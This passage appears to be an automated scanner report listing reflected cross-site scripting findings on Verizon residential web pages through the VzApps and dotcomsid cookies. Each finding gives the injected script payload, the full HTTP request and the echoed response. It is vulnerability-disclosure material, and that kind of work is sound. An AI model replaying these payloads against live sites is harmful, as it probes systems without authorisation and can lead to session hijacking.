Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX90afa'><script>alert(1)</script>32063bb4fe6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71887
Expires: Sat, 20 Nov 2010 02:54:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX90afa'><script>alert(1)</script>32063bb4fe6; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX90AFA'><SCRIPT>ALERT(1)</SCRIPT>32063BB4FE6 ' />
...[SNIP]...

1.194. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dc3af<script>alert(1)</script>751ce609535 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdc3af<script>alert(1)</script>751ce609535; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 02:54:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=TXdc3af<script>alert(1)</script>751ce609535; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDC3AF<SCRIPT>ALERT(1)</SCRIPT>751CE609535 </DIV>
...[SNIP]...

1.195. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48553"-alert(1)-"872a1235bd2 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=48553"-alert(1)-"872a1235bd2; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77665
Expires: Sat, 20 Nov 2010 02:53:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "48553"-alert(1)-"872a1235bd2"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.196. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 721a5<script>alert(1)</script>92d3aad9a2c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX721a5<script>alert(1)</script>92d3aad9a2c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 02:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX721a5<script>alert(1)</script>92d3aad9a2c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX721A5<SCRIPT>ALERT(1)</SCRIPT>92D3AAD9A2C </DIV>
...[SNIP]...

1.197. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e917'><script>alert(1)</script>680f4f478a3 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
